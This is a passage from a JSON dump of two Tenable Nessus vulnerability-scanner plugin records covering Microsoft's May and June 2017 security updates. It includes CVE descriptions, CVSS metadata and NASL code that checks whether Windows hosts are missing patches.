kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0223", "CVE-2017-0224", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0235", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_MAY_4016871.NASL", "href": "https://www.tenable.com/plugins/nessus/100055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100055);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0223\",\n \"CVE-2017-0224\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0235\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98214,\n 98217,\n 98222,\n 98229,\n 98230,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98452\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSFT\", value:\"MS17-4016871\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4016871/windows-10-update-kb4016871\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f546dcfb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4016871.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4016871' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4016871))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:25:02", "description": "The remote Windows host is missing a security update. It is, therefore, affected by one or more of the following vulnerabilities :\n\n - A remote code execution vulnerability exists in how the Remote Desktop Protocol (RDP) handles requests if the RDP server has Smart Card authentication enabled. An authenticated, remote attacker can exploit this, via a specially crafted application, to execute arbitrary code with full user privileges. (CVE-2017-0176)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A buffer overflow condition exists in the IIS WebDAV service due to improper handling of the 'If' header in a PROPFIND request. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to cause a denial of service condition or the execution of arbitrary code. This vulnerability, also known as EXPLODINGCAN, is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. (CVE-2017-7269)\n\n - A remote code execution vulnerability exists in how the Remote Desktop Protocol (RDP) handles requests if the RDP server has Routing and Remote Access enabled. An authenticated, remote attacker can exploit this, via a specially crafted application, to execute arbitrary code with full user privileges. (CVE-2017-8461)\n\n - A remote code execution vulnerability exists in Windows OLE, specifically in olecnv32.dll, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted file or email, to execute arbitrary code in the context of the current user. (CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "type": "nessus", "title": "Microsoft Security Advisory 4025685: Guidance for older platforms (XP / 2003) (EXPLODINGCAN)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0176", "CVE-2017-0222", "CVE-2017-0267", "CVE-2017-7269", "CVE-2017-8461", "CVE-2017-8487", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:iis"], "id": "SMB_NT_MS17_JUNE_XP_2003.NASL", "href": "https://www.tenable.com/plugins/nessus/100791", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100791);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0176\",\n \"CVE-2017-0222\",\n \"CVE-2017-0267\",\n \"CVE-2017-7269\",\n \"CVE-2017-8461\",\n \"CVE-2017-8487\",\n \"CVE-2017-8543\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 97127,\n 98127,\n 98259,\n 98752,\n 98824,\n 99012,\n 99013,\n 99035\n );\n script_xref(name:\"MSKB\", value:\"3197835\");\n script_xref(name:\"MSKB\", value:\"4018271\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4022747\");\n script_xref(name:\"MSKB\", value:\"4024323\");\n script_xref(name:\"MSKB\", value:\"4024402\");\n script_xref(name:\"MSKB\", value:\"4025218\");\n script_xref(name:\"MSFT\", value:\"MS17-3197835\");\n script_xref(name:\"MSFT\", value:\"MS17-4018271\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4022747\");\n script_xref(name:\"MSFT\", value:\"MS17-4024323\");\n script_xref(name:\"MSFT\", value:\"MS17-4024402\");\n script_xref(name:\"MSFT\", value:\"MS17-4025218\");\n script_xref(name:\"EDB-ID\", value:\"41738\");\n script_xref(name:\"EDB-ID\", value:\"41992\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"Microsoft Security Advisory 4025685: Guidance for older platforms (XP / 2003) (EXPLODINGCAN)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by one or more of the following vulnerabilities :\n\n - A remote code execution vulnerability exists in how the\n Remote Desktop Protocol (RDP) handles requests if the\n RDP server has Smart Card authentication enabled. An\n authenticated, remote attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with full user privileges. (CVE-2017-0176)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - A buffer overflow condition exists in the IIS WebDAV\n service due to improper handling of the 'If' header in a\n PROPFIND request. An unauthenticated, remote attacker\n can exploit this, via a specially crafted request, to\n cause a denial of service condition or the execution of\n arbitrary code. This vulnerability, also known as\n EXPLODINGCAN, is one of multiple Equation Group\n vulnerabilities and exploits disclosed on 2017/04/14 by\n a group known as the Shadow Brokers. (CVE-2017-7269)\n\n - A remote code execution vulnerability exists in how the\n Remote Desktop Protocol (RDP) handles requests if the\n RDP server has Routing and Remote Access enabled. An\n authenticated, remote attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with full user privileges. (CVE-2017-8461)\n\n - A remote code execution vulnerability exists in Windows\n OLE, specifically in olecnv32.dll, due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted file or email, to execute arbitrary\n code in the context of the current user. (CVE-2017-8487)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4025687/microsoft-security-advisory-4025685-guidance-for-older-platforms\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0780816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft IIS WebDav ScStoragePathFromUrl Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n 